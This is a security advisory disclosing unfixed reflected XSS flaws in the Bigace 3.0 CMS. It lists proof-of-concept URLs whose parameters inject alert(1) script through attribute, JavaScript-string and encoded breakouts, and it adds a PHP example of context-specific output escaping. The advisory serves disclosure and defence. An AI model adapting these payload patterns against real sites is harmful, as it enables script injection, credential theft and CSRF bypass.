28 Jan 2016

Bigace 3.0: XSS

Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Bigace 3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.bigace.de/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 01/28/2016
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

Bigace is a CMS written in PHP. Version 3.0 contains various reflected XSS vulnerabilities. These can lead to the injection of JavaScript keyloggers or the bypassing of CSRF protection; in this case, that may lead to code execution via a file uploader in the admin area.
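As an added example (not code from the advisory or from Bigace itself), the following PHP shows the two output contexts the payloads in section 3 target: an HTML attribute value (the language, level and start parameters) and a JavaScript string literal (the CKEditor, CKEditorFuncNum and jsfunction parameters), first rendered unsafely and then with context-specific escaping. The template fragments, function names and sample inputs are assumptions modelled on the PoC URLs, not Bigace's source.

```php
<?php
// Added example (not Bigace code): the two output contexts the advisory's
// payloads target, rendered first unsafely and then with context-specific
// escaping. Template fragments and parameter handling are assumptions
// modelled on the PoC URLs, not Bigace's actual source.

// Constructed inputs modelled on the section 3 payloads.
$samples = [
    'attribute' => '"><script>alert(1)</script>',
    'js_string' => '";}alert(1);function foo(){var foo="',
    'js_close'  => '</script><img src=no onerror=alert(1)>',
];

// Vulnerable pattern: request data concatenated verbatim into markup.
function renderVulnerable(string $language, string $funcNum): string
{
    return '<input type="hidden" name="language" value="' . $language . '">' . "\n"
         . '<script>function foo(){var foo="' . $funcNum . '";}</script>';
}

// Hardened pattern: escape for the exact context the value lands in.
function renderHardened(string $language, string $funcNum): string
{
    // HTML attribute context: encode & < > " ' so the value cannot close the
    // attribute or the tag. The attribute itself must stay quoted.
    $attr = htmlspecialchars($language, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // JavaScript string context: let json_encode produce the whole literal,
    // quotes included. The JSON_HEX_* flags hex-escape < > & ' " so a literal
    // "</script>" inside the value cannot terminate the script element.
    $js = json_encode($funcNum, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

    return '<input type="hidden" name="language" value="' . $attr . '">' . "\n"
         . '<script>function foo(){var foo=' . $js . ';}</script>';
}

// Defender-side check: does the raw payload survive into the response body?
function payloadReflected(string $html, string $payload): bool
{
    return strpos($html, $payload) !== false;
}

foreach ($samples as $name => $payload) {
    printf("%-10s vulnerable reflects raw payload: %s\n", $name,
        payloadReflected(renderVulnerable($payload, $payload), $payload) ? 'yes' : 'no');
    printf("%-10s hardened   reflects raw payload: %s\n", $name,
        payloadReflected(renderHardened($payload, $payload), $payload) ? 'yes' : 'no');
}

echo "\n", renderHardened($samples['attribute'], $samples['js_close']), "\n";
```

Each value is escaped once per output context at render time, not once at input time: a parameter that ends up both in an attribute and in a script block is escaped separately for each. Entity encoding is the wrong tool for the script block, since HTML entities are not decoded inside a script element and the JavaScript variable would receive literal `&quot;` sequences; json_encode yields a correct string literal and, with the JSON_HEX_* flags, still neutralises the `</script>` breakout shown in the jsfunction payload.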

3. Proof of Concept

http://localhost/bigace_3.0/public/index.php/filemanager/upload/index/?itemtype=4&language="><script>alert(1)</script>

http://localhost/bigace_3.0/public/index.php/filemanager/categories/index/?itemtype=4&language="><script>alert(1)</script>

http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&additional=CKEditor|CKEditorFuncNum&CKEditor=editorContent";}alert(1);function foo(){var foo="

http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&additional=CKEditor|CKEditorFuncNum&CKEditorFuncNum=";}alert(1);function foo(){var foo="

http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&jsfunction=SetUrl|url';}alert(1);function foo(){var foo='

http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&jsfunction=SetUrl</script><img src=no onerror=alert(1)>|url

http://localhost/bigace_3.0/public/index.php/admin/profile/index/%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e

http://localhost/bigace_3.0/public/index.php/admin/logging/index/en?start=1&amount=20&namespace=system&level="><script>alert(1)</script>&showLogs=Show

http://localhost/bigace_3.0/public/index.php/admin/logging/index/en?start="><script>alert(1)</script>&amount=20&namespace=system&level=1&showLogs=Show

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 CVE Requested, but not assigned
12/10/2015 Reminded Vendor of Disclosure Date
12/14/2015 Vendor requests more time
01/10/2015 Reminded Vendor of Disclosure Date
01/17/2015 Vendor discontinued project
01/28/2016 Disclosed to public